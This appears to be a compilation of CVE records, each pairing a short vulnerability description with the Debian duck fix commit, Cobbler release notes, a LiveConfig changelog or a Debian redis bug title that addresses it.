duck before 0.10 did not properly handle loading of untrusted code from the current directory..

**Commit b43b5bbf** authored Jul 04, 2016 by ![Simon Kainz's avatar](https://seccdn.libravatar.org/avatar/1065d332eb9715d6c2ac4c4a9ec45ac9?s=48&d=identicon&gravatarproxy=n "Simon Kainz")

Browse files

**handle loading untrusted code from current directory**

*   Changes 5

...

...

@@ -24,8 +24,6 @@

use strict;

use warnings;

use lib '.';

package DUCK;

my $VERSION \='0.10';

...

...

duck.conf /etc/duck

duck usr/bin

lib usr/share/duck

\\ No newline at end of file

lib usr/share/duck

DUCK.pm /usr/share/duck

...

...

@@ -7,4 +7,4 @@ LIBDIR = lib

dh $@

override\_dh\_auto\_test:

$(PERL) -Mlib=$(LIBDIR) -wc duck

\\ No newline at end of file

$(PERL) -wc duck

\\ No newline at end of file

...

...

@@ -24,8 +24,8 @@

use strict;

use lib '/usr/share/duck';

use lib '/usr/share/duck/lib';

use lib './lib';

use DUCK;

use Getopt::Std;

...

...

@@ -37,7 +37,7 @@ use File::Path qw(remove\_tree);

use Cwd;

use IPC::Open3;

use POSIX ":sys\_wait\_h";

require lib;

#require lib;

sub HELP\_MESSAGE();

...

...

@@ -65,10 +65,10 @@ $SIG{INT} = sub { print $color\_r."Aborting, please wait!\\n".$color\_n;$abort=1;cl

my $checksdir\='/usr/share/duck/lib/checks';

if ( \-d "./lib/checks" )

{

$checksdir\='./lib/checks';

}

# if ( -d "./lib/checks" )

#{

# $checksdir='./lib/checks';

#}

my $try\_https\=0;

...

...

...

...

@@ -64,7 +64,8 @@ quiet mode. Suppress all output.

dry run. Don't run any checks, just show entries to be checked.

.TP

\\fB\\--modules-dir=\\fRDIRECTORY

specify modules directory. Mostly useful for developing new checks.

specify modules directory. Mostly useful for developing new checks. If this parameter is specified, only modules defined in this

directory are used. You have to copy all \\fI\*.pm\\fR files from \\fI/usr/share/duck/lib/checks\\fR to the directory specified.

.TP

\\fB\\--color=\\fR\[WHEN\]

Specify when to emit escape sequences to the output. Available options are:

...

...

CVE-2016-1239: handle loading untrusted code from current directory (b43b5bbf) · Commits · Debian / The Debian Url ChecKer

An issue was discovered in Cobbler through 3.3.0. In the templar.py file, the function check_for_invalid_imports can allow Cheetah code to import Python modules via the "#from MODULE import" substring. (Only lines beginning with #import are blocked.)

This release addresses mainly security issues and bugfixes.

We have 212 files changed, 2665 insertions(+), 125148 deletions(-)

Milestone: https://github.com/cobbler/cobbler/milestone/15

Diff to last release: v3.3.0...v3.3.1

**Announcements**:

*   Important Security Bugfixes
    *   CVE-2021-45082: Incomplete template sanitation #2945
    *   CVE-2021-45083: Make configuration files only readable by root #2945
    *   Stabilize MongoDB serializer #2919
    *   Log file pollution: validate the data before logging it #2911
    *   Authentication: Remove testing module due to hardcoded well known  
        credentials #2908

**New**:

*   Support for Windows 11 #2819
*   Support for FreeBSD 12.2 & 13.0 #2929
*   UEFI support #2416

**Breaking Changes**:

*   `cobbler mkgrub` renamed to `cobbler mkloaders` #2807

**Bugfixes**:

*   `cobbler <item> rename` should work again now #2824
*   ldap\_anonymous\_bind #2831
*   Wrong bind path for Debian #2927
*   RHEL/Fedora arches in signatures #2895
*   Auto migrate settings #2871
*   System: Fix serial\_device and serial\_baud\_rate #2923
*   Cannot set property 'file' of image #2878
*   Enums: Fix failure to convert `<<inherit>>` #2920
*   `cobbler mkloaders` for non-SUSE distros did not work #2851
*   Added `ipv6_prefix` to `post_install_network_config` #2928

**Other**:

*   Internal Refactorings:
    
    *   Add systemctl for systemd based systems #2841
    *   Enums: Create general str to enum converter #2901
    *   Systems: Re-enable the modify\_interface call #2921
    *   Utils: Check if service is running before stopping it #2936
    *   Several check enhancements #2809
    *   Remove old Cobbler Web leftovers #2938
    *   Simplify remote\_boot\_file setters #2886
*   Docs
    
    *   Explain TFTP and internal database #2904
*   Tests:
    
    *   Add tftpgen unit tests #2808
    *   Add system unit tests #2814
    *   Add system test for `cobbler buildiso` #2822
    *   XMLRPC test for adding an interface to a system #2907
*   CI/container:
    
    *   Improvements for the development container #2806
    *   Use prebuilt images for testing #2812
    *   CentOS to Rocky Linux move for Compose #2939
    *   Add python-rpm-macros #2872

This release got everything! Security, Features, Bugfixes, ...

We have 422 files changed, 25375 insertions(+), 34826 deletions(-)

Milestone: https://github.com/cobbler/cobbler/milestone/10

Diff to last release: v3.2.1...v3.3.0

**Known Issues**:

*   `cobbler <item> rename` is not working currently
*   `cobbler <item> edit` may have bugs due to the internal refactorings

**Breaking Changes**:

*   The webinterface got removed #2434 #2434 #2700
    *   Please use the CLI in the meantime
    *   A new webinterface is under development at https://github.com/cobbler/cobbler-web
    *   The core code has priority at any time. There are third party tools available which provide a webinterface and use  
        Cobbler as a backend. A list of those tools can be found at the bottom of the following page: https://cobbler.github.io/users.html
*   The Cobbler internal TFTP Demon got removed #2512
*   `yaboot` support got removed as a bootloader for PowerPC #2723

**Announcements**:

*   Important Security Bugfixes #2794 #2795
    *   Arbitrary Read was possible through `generate_script()`
    *   Arbitrary Write was possible through `upload_log_data()`
    *   Log poisoning with Remote-Code-Execution was possible through any XMLRPC method which logs to the logfile.
*   There was an internal refactoring from runtime created Python attributes to Python Properties. This allows much  
    better data validation and thus better error handling but also introduced new bugs.  
    Related: #2433 #2666 #2677 #2753 #2699 #2692 #2684 #2707 2727 #2726 #2685 #2675 #2678 #2682 #2674 #2676 #2681 #2683 #2696 #2702 #2732 #2733 #2722 #2680 #2711
*   This is the first release with the new avatar #2604

**New**:

*   The `migrate-data-v2-to-v3.py` script is now packages and can directly be used #2591
*   The `mkgrub.sh` script was converted to the command `cobbler mkgrub` #2739 #2721
*   We now have automigrations and validation for the application settings #2747 #2719 #2772 #2769
*   New distros are now able to be imported:
    *   Debian 11 #2758
    *   Fedora 34 #2713
*   `cobbler sync` now supports syncing only specified systems #2601
*   You can now define your own boot menu structure #2575
*   Cobbler is able to run on RockyLinux and import it #2627
*   DHCPv6 is now natively supported #2539 #2511 #2647

**Changes**:

*   Internal cache got fully removed with #2684 (related #2661)
*   `cobbler get-loaders` was removed for security reasons #2572
*   Removed the `simplejson` dependency as it is redundant now #2572
*   Docs: Multiple enhancements #2599 #2788
*   Logger: Changed to the default Python 3 logger (much more configurable) #2573
*   Old bootloaders which were not shipped by default got removed #2641
*   Windows autoinstallation was simplified #2767
*   We are now using `os.urandom` instead of `/dev/urandom` #2752
*   We have reduced the usage of the generic `CX` exception #2643
*   `ipmilanplus` is the default fence agent for power operations #2714
*   For nested GRUB menus we now show an indicator #2693 #2693
*   Items can now be found even if the item type is not specified #2663

**Bugfixes**:

*   Be compliant with CORS pre-flight requests #2594
*   `cobbler reposync`: SSL related problems were fixed #2759
*   Autoinstall templates directory was wrong per default. #2590
*   We do not strip the last two characters anymore when rendering via an HTTP(S) Endpoint #2626
*   `cobbler check` does not complain about the old name of the settingsfile anymore #2630
*   openSUSE Tumbleweed AutoYAST templating was fixed again 2629 #2628 #2632
*   `cobbler hardlink` now works with non default web directories #2774
*   GRUB got a few Cobbler related fixes #2653 #2792 #2743
*   `pxe_just_once` is working as expected now #2783 #2784
*   Anaconda installation process `ONBOOT` is now able to be set with and without qotation marks 2775
*   The Autoinstall Manager crashes correctly in case of an error #2791
*   `cobbler distro delete` now doesn't leave repository configs behind #2729 #1370
*   `cobbler sync --dns` is now working as expected again #2710 #2712

**Other**:

*   Internal Refactorings:
    *   Base class for all manager modules is used now #2610
    *   Cobbler litesync was moved into Cobbler sync #2615
    *   `field_info.py` functionality was removed since it was unused #2662
    *   API is used instead of the collection manager #2652
    *   Settings are now held in the API instead of the collection manager #2664
    *   Directly use the UUID module where available #2650
    *   Don't clone an object during rename #2744
    *   `kopts_overwrite` is more error resistent now #2651
*   Docs:
    *   Added missing dependency for building #2571
    *   Fix build errors #2633
    *   Extend `__init__.py` files with content about Python modules #2642
    *   Spelling #2731
    *   Types for many external API methods #2785
    *   Document properties #2773
    *   General cleanup #2771
*   Tests: Multiple new testcases to improve stability and coverage #2656 #2740 #2745 #1492 #2645 #2649
*   GitHub Issue templates were revamped #2578
*   Packaging: Specfile got a few improvements #2780
*   CI:
    *   Obsolete testing container #2730
    *   Also use the openSUSE Build Service for packaging on PRs #2672
    *   Package also for openSUSE #2607
    *   Enhance the Setup scrips #2331
*   Development: Container now exposes 80 & 443 2609

This is a security only release.

> The Django webinterface is removed with V3.3.0 but is included in V3.2.2!

We have

Milestone: https://github.com/cobbler/cobbler/milestone/17

Diff to last release: v3.2.1...v3.2.2

**Breaking Changes**: None

**Announcements**:

*   Important Security Bugfixes #2797
    *   Arbitrary Read was possible through `generate_script()`
    *   Arbitrary Write was possible through `upload_log_data()`
    *   Log poisoning with Remote-Code-Execution was possible through any XMLRPC method which logs to the logfile.

**New**:

*   AlmaLinux & RockyLinux are now supported #2705

**Changes**: None

**Bugfixes**: None

**Other**:

*   Release preparations #2798

This release is a lot about bug fixes and smaller improvements.

Important: This will be the very last release to contain the already deprecated Django Web Interface.

We have 184 changed files, 8391 insertions and 3362 deletions. We have merged 45 pull requests.

Milestone: https://github.com/cobbler/cobbler/milestone/9

Diff to last release: v3.2.0...v3.2.1

**New**:

*   Signatures: Add ESXi 7.0 U1 #2525 #2526 #2442
*   Signatures: Add AlmaLinux to supported distros #2536
*   Signatures: Add generic openSUSE Leap 15 #2508
*   Settings: Use `.yaml` as a file extension #2531
*   Settings: Validate what settings we have in the YAML-File #2533 #2419 #2530
*   Modules: We now support automatic Windows installations #2466
*   Docs: Terraform provider now included #2166 #2528

**Changes**:

*   Web Frontend: Show VMware as a breed #2449
*   Logging check fails with SELinux #2440 #2441
*   Typing: Convert docstring types to typing types #2564
*   ESXi Support: Now partly supported #2541
*   `ipmitool` now is upstream supported by `fence_agents` via `ipmilanplus` #2542
*   `cobbler version` remove the `b` prefix #2543
*   We are now using `inst.ks` instead of `ks` #2534
*   Use the python-file bindings instead of a subprocess call #2482 #2480
*   Web Interface: Make new user management more obvious #2484

**Bugfixes**:

*   Remove redundant `.json` suffix: #2451 #2376 #2545 #2529
*   PAM Authentication failures are fixed now: #2400 #2444
*   Templating: Fix Cheetah macros #2570 #2509 #2403
*   Templating: Fix regex replacements #2513
*   Templating: Add `http_port` to all snippets we are aware of #2058
*   API: Have the legacy fields `kickstart` and `ks_meta` present at all times. #2311 #2568
*   Replicate: `revert_strip_none` prior adding an object on replicate #2548 #2505
*   Replicate: Fix paths during replication #2516
*   Web interface: Fix snippet path #2520
*   Web interface: Prevent duplicate pathing of snippets #2485
*   Fix script path from Cobbler #2479 #2478
*   Settings: Add missing rsync flags option #2467 #2468
*   Startup: Cobbler starts with sub-profiles now #2259 #2450
*   Web: Permissions for `/var/lib/cobbler/web.ss` #2439 #2452
*   Power management: Follow the `fence_agent` return codes #1491
*   `cobbler check`: Fix dnsmasq check #2155

**Other**:

*   CI: We changed to GitHub Actions from Travis #2514
*   CI: Add Test-PyPi release for every commit on `master` #2533 #2553 #2565
*   CI: Configure linters #2422 #2506
*   CI: Replace Fedora 31 with Fedora 33 for building packages #2463
*   Tests: Add more coverage #2554 #2550 #2546
*   Cleanup unused import #2551
*   Docs: Improvements at various places #2547 #2481 #2473 #1801 #2228
*   Removed unused multi-language support #2532
*   Un-categorized improvements #2524 #2464
*   Packaging: CentOS builds because of a virtual provides for a dependency #2340
*   Items: Streamline `template_types` type in all items #2262
*   Docker: Add `ldap` to the image per default #2335

**Breaking Changes**:

*   Possibly the settings file is not correctly migrated and needs to be manually adjusted.
*   Rename `settings` to `settings.yaml`
*   Add all keys which are missing. List will be available in `/var/log/cobbler/cobbler.log`.
*   We dropped support for CentOS 7 since no full Python 3 stack is available #2515

**Announcement**:

*   We will try to fade out Cheetah3 over time. Release 4.0.0 will contain only Jinja2 templates. We will aide and help with the transition and try to make it as smooth as possible
*   We will remove the internal implementation of the TFTP daemon with 3.3.0. If you use it, please use one from your system vendor in the future.

This release is a lot about bug fixes and smaller improvements.

**Important**: This will be the last release to contain the already deprecated Django Web Interface.

We have 2,960 additions and 1,018 deletions. We have merged 30 pull requests.

Milestone: V3.2.0

**New**:

*   Include Fedora32 & Ubuntu Focal in `signatures.json` (#2405)
*   Move rsync flags to the Cobbler settings `reposync_rsync_flags` (#1480 #2399)
*   Add a new Flag - `cache_enabled` - to enable or disable the cache (#2387)
*   When doing autoinstallations the conversion of hostnames to ips is now optional via this settings: `convert_server_to_ip` (#2357)

**Changes**:

*   Specfile got multiple improvements (#2413 #2409 #2334 #2351 #2355 #2392)
*   Documentation improvements (#2406 #2407 #2377 #2360 #2361 )
*   String replacments will now have a better performance (#2417)
*   Remove Python2 compability layer fully (#2402)
*   Rewrite the Spacewalk Auth Module (#2401)
*   Address tech-debt (#2380)
*   When building yourself you can configure the tftp directory (#2359)

**Bugfixes**:

*   Finally include ESXI7 Signatures (#2435 #2441)
*   Fix startup error when config variable is called before assignment. (#2394)
*   Remove dead code (#2367)
*   FileNotFoundError when under high load (#2362 #2365)
*   Sorting in the WebUI (#2265 #2390)
*   When copying a system, the invalid MAC error is now fixed (#2397)
*   Fix error message on the cli when using \`--verbose\`\` (#2388)
*   Fix some reposync related problems (#2384)
*   Fix repo and mgmtclass initializations (#2374 #2373)

**Other**:

*   Improved Tests (#2408 #2420)

**Breaking Changes**: We should have no breaking changes in this version.

This release syncs release30 with master. No patches for release30 were needed specifically.

We have +13,585 additions and −6,365 removals. We have merged 45 pull requests.

**New**:

*   For the distro there is now a parameter `remote_boot_initrd` and `remote_boot_kernel` ()
*   For the profile there is now a parameter `filename` for DHCP. (#2280)
*   Signatures for ESXi 6 and 7 (#2308)
*   The `hardlink` command is now detected more dynamically and thus more error resistant (#2297)
*   HTTPBoot will now work in some cases out of the bug. (#2295)
*   Additional DNS query for a case where the wrong record was queried in the `nsupdate system` case (#2285)

**Changes**:

*   Enabled a lot of tests, removed some and implemented new. (#2202)
*   Removed not used files from the codebase. (#2302)
*   Exchanged `mkisofs` to `xorrisofs`. (#2296)
*   Removed duplicate code. (#2224)
*   Removed unreachable code. (#2223)
*   Snippet creation and deletion now works again via xmlrpc. (#2244)
*   Replace `createrepo` with `createrepo_c`. (#2266)
*   Enable Kerberos through having a case sensitive `users.conf`. (#2272)

**Bugfixes**:

*   General various Bugfixes (#2331, )
*   `Makefile` usage and commands. (#2344, #2304)
*   Fix the dhcp template. (#2314)
*   Creation of the management classes and gPXE. (#2310)
*   Fix the `scm_track` module. (#2275, #2279)
*   Fix passing the `netdevice` parameter correctly to the `linuxrc`. (#2263)
*   `powerstatus` from cobbler now works thanks to a wrapper for `ipmitool`. (#2267)
*   In case the LDAP is used for auth, it now works with ADs. (#2274)
*   Fix passthru authentication. (#2271)

**Other**:

*   Add Codecov. (#2229)
*   Documentation updates. (#2333, #2326, #2305, #2249, #2268)
*   Buildprocess:
    *   Recreation and cleanup of Grub2. (#2278)
    *   Fix small errors for openSUSE Leap. (#2233)
    *   Fix `rpmlint` errors. (#2237)
    *   Maximum compatibility for debbuild package creation. (#2255, #2292, #2242, #2300)
*   Fixes related to our CI Pipeline (#2254, #2269)
*   Internal Code cleanup (#2273, #2270)

**Breaking Changes**:

*   Hash handling in users.digest file. (#2299)
*   When using a DEB or RPM we now replace the configs. So preserving the config needs to be ensured by you.

**Bugfixes**:

*   Incremented Version to 3.1.1 from 3.0.1

This release syncs release30 with master. No patches for release30 were needed specifically.

I would like to especially thank @Conan-Kudo for his work on the cross-distro specfile for cobbler and koan as well as @rbberger who was so kind to contribute a lot regarding building the rpms in docker for CentOS with the specfile this helped a lot!

We have a 8497 line diff for this release.

**New**:

*   We are now having a cross-distro specfile which can be build in the OBS (#2220) - before rewritten it was improved by #2144 & #2174
*   Grub Submenu for net-booting machines (#2217)
*   Building the Cent-OS RPMs in Docker (#2190 #2189)
*   Reintroduced manpage build in `setup.py` (#2185)
*   `mgmt_parameters` are now passed to the dhcp template (#2182)
*   Using the standard Pyhton3 logger instead of a custom one (#2160 #2139 #2151)
*   Script for converting the settings file from 3.0.0 to 3.0.1 (#2154)
*   Docs now inside the repo instead of cobbler.github.io and improved with sphinx (#2117)

**Changes**:

*   The default tftpboot directory is now `/var/lib/tftpboot` instead of previously `/srv/tftpboot` (#2220)
*   Distro signatures were adjusted where necessary (#2219 #2134)
*   Removed `requirements.txt` and placed the requirements in `setup.py` (#2204)
*   Display only entries in grub which are from the same arch (#2191 #2216)
*   Change the name of the cobbler manpage form `cobbler-cli` to `cobbler` back and move it to section 8 (#2188 #2186)

**Bugfixes**:

*   S390 Support was cleaned up (#2207 #2178)
*   PowerPC Support was cleaned up (#2178)
*   Added a missing import while importing a distro with `cobbler import` (#2201)
*   Fixed a case where a stacktrace would be produced so pass none instead (#2203)
*   Rename of `suse_kopts_textmode_overwrite` to `kops_overwrite` to `utils` (#2143 #2200)
*   Fix rsync subprocess call (#2199 #2179)
*   Fixed an error where the template rendering did not work (#2176)
*   Fixed some `cobbler import` errors (#2172)
*   Wrong shebang in various scripts (#2148)
*   Fix some imports which fixes errors introduced by the remodularization (#2150 #2153)

**Other**:

*   Issue Templates for Github (#2187)

**Breaking Changes**: None

This version comes with the following changes and new features:

**Fixes**:  
\- Fixes the use of disk drivers with koan (#1936)  
\- Fix rsync distro import (#1613)  
\- Fix built-in tftp server (#2018)  
\- Fix URL generation when https is enabled (#2063)  
\- Update the signatures (#2141 #2105)  
\- Update the sample.seed file with master (#2092)  
\- Only use the set-module only as a fallback (#2090)  
\- Fix IPMI usage (#2110)  
\- Some small Web-UI fixes (#2111 - contains also the version bump in the files where needed)  
\- Fix for the dhcp\_tag being undefined (#2095)

**New**:  
\- Use django 1.8+ (#2104)  
\- Add mgmt\_parameters to the dhcp template (#2180)  
\- Docs are now maintained inside this repo for readthedocs.io (#2197)

**Announcements**: The V3.x.x branch is now maintained in his own branch to allow development changes to go on top of master.

**Changes**:

*   We made cobbler now more modularized. So plugins can be grouped by directories and can be imported from sub-directories.
*   We dropped support for older Ubuntu versions.
*   We updated the `dhcpd.template` to bring an improved experience with dhcp templating.
*   We removed the custom logger and are now using the standard python3 logger with a config in `/etc/cobbler/logging_config.conf`
*   We fixed some shebangs to `/usr/bin/python3` to ease the pain for package maintainers
*   And more smaller fixes which should not affect your day to day usage but should improve your experience with cobbler.

**WARNING**: This release contains breaking changes for your settings file! A guide on how to convert your settings file can be found here cobbler.github.io

CVE-2021-45082: Releases · cobbler/cobbler

A Path Traversal vulnerability for a log file in LiveConfig 2.12.2 allows authenticated attackers to read files on the underlying server.

**Changes in version 2.13.1 (01/30/2022):**

*   fixed wrong table order in MySQL schema (table `APIKEYS` couldn’t be created)
*   implemented rate limit for dynamic DNS updates (default: 15 updates per 10 minutes, configurable via LCDefaults key `dns.updateLimit`)
*   create `/etc/ssl/chains` if not existing on initial Apache configuration
*   updated Expat library to v2.4.4

**Changes in version 2.13.0 (10/15/2021):**

*   improved usability for “Delete Mailbox” button (prevent unintended deletion of mailbox)
*   preparing for rate limiting Dynamic DNS updates
*   security fix (file access - low impact level)
*   security fix (stored XSS within own customer data, low impact level)
*   updated Site.pro module
*   IP addresses can optionally be added only to web server vHost config, but not to DNS
*   Debian/Ubuntu: moving intermediate certificate files from `/etc/ssl/certs/*-ca.crt` to `/etc/ssl/chains/*-ca.crt`, adjusting Apache and ProFTPD configuration and running `c_rehash` (workaround for local OpenSSL validation problem/bug with Let’s-Encrypt “R3” certificate, see blog post)
*   disabling of SSH accounts did not work when using private key authentication
*   fixed warning regarding missing systemd-reload after update
*   fixed bug in Let’s Encrypt module when finalization has failed and is in “processing” state
*   DNS updates got stuck in a loop when multiple large IP groups where updated within a short interval

**Changes in version 2.12.2 (08/25/2021):**

*   allow disabling default MX records when setting custom MX records
*   improved detection of CentOS Stream 8
*   updated OpenSSL to 1.1.1l
*   differing MX was not used when adding a new domain

**Changes in version 2.12.1 (08/11/2021):**

*   improved displaying MX records and SMTP server name
*   autoresponder status wasn’t displayed in mailbox list

**Changes in version 2.12.0 (07/29/2021):**

*   allow configuration of PHP FPM pool settings (e.g. `pm.max_children`) via php.ini management
*   allow configuration of differing MX records for Postfix
*   edit mailbox: added “info” tab with all mailbox settings at a glance
*   support for Debian 11 (“Bullseye”)
*   support for CentOS Stream 8
*   log SASL user name in lcpolicyd when rejecting e-mails
*   improved security of password protection when using NGINX as reverse proxy for Apache
*   also removing `/var/tmp` from `open_basedir` in php.ini when running PHP via FPM
*   show subscription comment also to end-users (in webspace overview) to better differentiate between multiple subscriptions
*   prepared new licensing features
*   improved compatibility of Autodiscover feature with Microsoft Outlook Connectivity Test
*   support deletion of dynamic DNS records (A or AAAA)
*   connection to MySQL now also possible via IP (instead of only UNIX socket)
*   fixed timing problem when updating Postfix map files (could lead to deadlock under certain conditions)
*   Postfix `sender_bcc`/`recipient_bcc` also contained addresses without destination address
*   updating the validity period of SSL intermediate certificates if this is missing
*   fixed bug when allowing external database access for existing databases

**Changes in version 2.11.3 (04/06/2021):**

*   allow configuration of a default SPF record (if no custom SPF record is defined for a domain)
*   changed default location of most .pid files from `/var/run/` to `/run/` on Debian/Ubuntu
*   supporting installation with mod\_php and without php-cgi
*   allow disabling creation of catch-all e-mail addresses (existing catch-all addresses can still be managed)
*   updated OpenSSL to 1.1.1k
*   allowing UTF symbols (e.g. emojis) in domain names
*   disabling sql\_mode _ONLY\_FULL\_GROUP\_BY_ when using MySQL/MariaDB as backend database for LiveConfig
*   when adding/deleting directly managed secondary DNS servers from DNS templates, the `zones.liveconfig` file sometimes not was updated
*   DNSSEC keys where removed under certain conditions when DNS templates where modified
*   fixed expiry date of intermediate SSL certificates (some certificate chains where shown as being expired)

**Changes in version 2.11.2 (02/22/2021):**

*   fixed bug in PHP version list (list was empty in some cases)

**Changes in version 2.11.1 (02/22/2021):**

*   updated OpenSSL, Unbound and cURL libraries
*   restricted PHP versions are marked in overview list
*   disabled reverse DNS lookups in ProFTPD (configuration needs to be refreshed)
*   checking BCC destinations against forward domains blacklist
*   number of subdomains using the default PHP version was not counted correctly
*   fixed several missing translations

**Changes in version 2.11.0 (02/16/2021):**

*   usage of outdated PHP versions can now be restricted
*   a copy of all incoming and outbound e-mails can now be sent via BCC to another address (e.g. for e-mail archiving)
*   added SOAP method `CustomerDelete()`
*   a comment can now be added to subscriptions (to better differentiate between several subscriptions)
*   ignore errors when LogRotate `postrotate` command fails
*   improved error handling when PHP-FPM is not installed and a subscription was configured with PHP-FPM
*   rejecting e-mails to local accounts, except those listed in `/etc/aliases`
*   show message when OpenDKIM wasn’t found
*   increased maximum password length for `HostingMailboxAdd/Edit()` to 200 chars
*   private log files are now also rotated even if the user has exceeded his filesystem quota
*   suPHP option is not available any more for new hosting plans & subscriptions (suPHP is deprecated and will not be supported in the future)
*   option “skip DNS check” was ignored when adding a new SSL certificate (worked only when editing existing SSL jobs)
*   fixed bug in detection of PHP 7.4 FPM on Ubuntu 20
*   number of subdomains using the default PHP version was not counted correctly
*   fixed bug in `UsageStats` (`HostingSubscriptionGet()`) - data was returned in bytes/kB instead of MB

**Changes in version 2.10.4 (11/13/2020):**

*   replaced `%h` with `%a` in Apache LogFormat
*   userprefs path for SpamAssassin now is always created when spam filter is enabled for a mailbox (allows using the Bayes filter)
*   fixed JavaScript escaping (affected some popup windows on French interface)
*   don’t use system skeleton directory when creating users on CentOS/RHEL

**Changes in version 2.10.3 (11/05/2020):**

*   fixed bug when changing database password on MariaDB 10.1.x
*   also display installed but unused PHP versions at Server Management -> Web
*   fixed bug in login informations popup (when no language was configured for the receiving user)

**Changes in version 2.10.2 (10/30/2020):**

*   support enabling DNSSEC when adding domain via SOAP API
*   show end-of-life (EOL) date and comments in PHP version select dropdown
*   edit comments and EOL dates of PHP versions (Server Management -> Web)
*   domains/subdomains added via SOAP API are now displayed in “default view” by default
*   when a subscription is deleted, all assigned SSL certificates are now automatically deleted too
*   e-mail with login informations is now prepared in language of recipient
*   user language can be selected when adding a customer or editing a user
*   Webspace overview doesn’t show the host ID any more, but the server name (hostname)
*   server description is now displayed in server selection dropdown (when creating a new subscription)
*   permissions of directories created with `LC.fs.mkdir_rec` were too restrictive
*   support MySQL “authentication\_string” authorization with upgraded databases
*   displayed wrong size of DNSSEC keys (factor 8)
*   fixed HTML escaping of translated phrases
*   when disabling a user, active sessions are immediately closed

**Changes in version 2.10.1 (09/17/2020):**

*   some configuration files where created with wrong permissions (error in v2.10.0)

**Changes in version 2.10.0 (09/16/2020):**

*   allow wildcard domains (e.g. `*.example.org` or even `*.tld`) for e-mail blacklists/whitelists
*   SOAP method `HostingMailboxGet()` added (returns configuration of an e-mail address)
*   use `/var/www/.skel` (if existing) as so-called “skeleton directory” when adding new webspace accounts
*   support global configuration overrides for PHP FPM pools (Lua table `LC.web.FPMCONFIG`)
*   checking expire date of intermediate (chain) SSL/TLS certificates
*   full support for CentOS 8
*   full support for Ubuntu 20.04 LTS
*   IFRAME-API: added `toTop()` javascript function to scroll to top of page from within IFRAME content
*   supporting openSUSE 15.1
*   SOAP method HostingSubscriptionGet() now also returns a list of all configured e-mail addresses
*   prepared for repository GPG key rollover (key id: D409AC6D65FE6664)
*   supporting domain-specific Apache configuration includes also with proxy destinations
*   updated OpenSSL to v1.1.1g
*   supporting new privilege system on MariaDB 10.4
*   changed default mailbox home directory from `/var/mail` to `/var/mail/%C/%I` (fixes problem with repeated mails from autoresponder)
*   improved MySQL authentication to work with MySQL 8.x
*   support _auth\_socket_ authentication (without password) for MySQL root user
*   iOS mobileconfig supports multiple mailboxes within same domain on same device
*   iOS mobileconfig supports disabling IMAPS/POP3S (port 993/995)
*   added _autocomplete_ attributes to password fields for better usability
*   minor CSS improvements
*   improved NGINX vHost configuration for web statistics
*   improved NGINX reverse proxy configuration
*   SOAP method HostingSubscriptionGet() now also returns configured PHP version per subdomain as well as usage data of the subscription (UsageStats)
*   increased limit for php.ini settings (text) from 512 to 4096 byte
*   changed default setting for php.ini setting `opcache.file_cache` from `%HOME%/tmp` to "” (empty string), effectively disabling file cache by default
*   added `%PHP%` placeholder in php.ini settings (allows option `opcache.file_cache` to be set per PHP version, e.g. `%HOME%/.cache/opcache.%PHP%`)
*   fixed wrong password limit when enabling/modifying OTP configuration
*   fixed minor bug when searching for full mail address in list of mailboxes
*   domain was not removed from Postfix’ `recipient_access` file when locked subscription was deleted
*   fixed bug when creating additional ftp accounts using `HostingFtpAdd()` (affected version 2.9.x)
*   fixed bug resetting shell to `nologin` when reseller has edited an existing hosting plan
*   fixed problem in ACMEv2 client when using e.g. Buypass CA
*   .htpasswd file for web statistics was not generated when using only NGINX
*   disabling TLS1/TLS1.1 was ignored with NGINX
*   SSL cipher selection (default/strong) wasn’t applied to NGINX vHosts
*   fixed bug when changing password on MySQL 8.x

**Changes in version 2.9.3 (03/03/2020):**

*   fixed problem regarding Let’s Encrypt update when MySQL was being used as backend database

**Changes in version 2.9.2 (03/03/2020):**

*   allow downloading list of SSL certificates as CSV file
*   added option to disable TLSv1/TLSv1.1 per IP group for web server
*   added SOAP methods `HostingDCVCreate()`/`HostingDCVDelete()`
*   improved systemd configuration of liveconfig/lcclient
*   ACMEv2: some fixes to work with Let’s Encrypt Staging API
*   automated renewal of SSL certificates from Let’s Encrypt affected by their “CAA rechecking bug”
*   lcphp: `PHP_BINARY` environment variable got lost
*   SAN domains were ignored in SSL orders (v2.9.x)

**Changes in version 2.9.1 (12/13/2019):**

*   SSL certificates: added filter option “only own certificates”
*   salutation (contact data) can now be left empty
*   table search string wasn’t saved during page refresh
*   fixed display of version number in “Servers” report
*   fixed bug (missing permissions) when adding a FTP user as an additional LiveConfig user
*   fixed missing permission check when editing domains at “my hosting” as additional LiveConfig user
*   comparing `HC_REFRESHCFG` with version number (revision number not available any more)
*   fixed bug in quota check when editing mailboxes

**Changes in version 2.9.0 (11/29/2019):**

*   Let’s Encrypt: retry domain validation after HTTP errors (eg. timeout with Let’s Encrypt API) every 15 minutes
*   the DNS checks for automated SSL/TLS certificates can now be individually skipped (e.g. when using a CDN)
*   when private IPv4 addresses are used (without corresponding IP\_NAT data) then the DNS checks for Let’s Encrypt are automatically skipped
*   it’s now possible to change the PHP CLI used by the Application Installer (using Lua variable `LC.web.PHPCLI`)
*   automatic configuation of automated SSL certificates can now optionally be disabled (using checkboxes in order form)
*   allow binding Postfix only to localhost (127.0.0.1)
*   when an additional admin user adds a new server, he now automatically gets all permissions for that server
*   when a domain is deleted, optionally all assigned SSL certificates can be deleted too
*   improved detection of matching wildcard SSL certificates when configuring subdomains
*   list of SSL certificates can now be filtered (expired, unassigned, …)
*   mass mails aren’t sent to suspended customers any more (can be enabled via checkbox)
*   overview of SSL jobs (start page) doesn’t show entries of suspended customers any more
*   allow editing e-mail addresses of Let’s Encrypt accounts
*   display HTTPS links in AppInstaller if domain is configured with SSL
*   AppInstaller: uninstall sometimes failed when directory of application didn’t yet exist or was already deleted before uninstall
*   deleting a domain with existing mailboxes as reseller sometimes returned an error (missing permissions)
*   end users with hosting plans created via GUI didn’t have the permission to view the LiveConfig event log
*   fixed display error when editing a subdomain while parent domain has “(+www)” configuration enabled, preferring the “.www” subdomain
*   fixed bug when merging www/non-www subdomains if they were configured as redirect
*   don’t allow to automatically order SSL certificate when adding a new domain if user has no SSL management permissions
*   fixed bug when adding an automated SSL certificate with automatic HTTPS redirect (non-webspace targets where configured incorrectly)
*   fixed bug when configuring FPM with default PHP on CentOS (wrong directory for pool configuration)
*   lcsam: removed duplicate line breaks in X-Spam-Report

**Archive**

*   Changelog for version 2.0-2.8
*   Changelog for version 1.x

CVE-2021-40841: Changelog

It was discovered, that redis, a persistent key-value database, due to a packaging issue, is prone to a (Debian-specific) Lua sandbox escape, which could result in remote code execution.

CVE-2022-0543: #1005787 - redis: CVE-2022-0543 - Debian Bug report logs

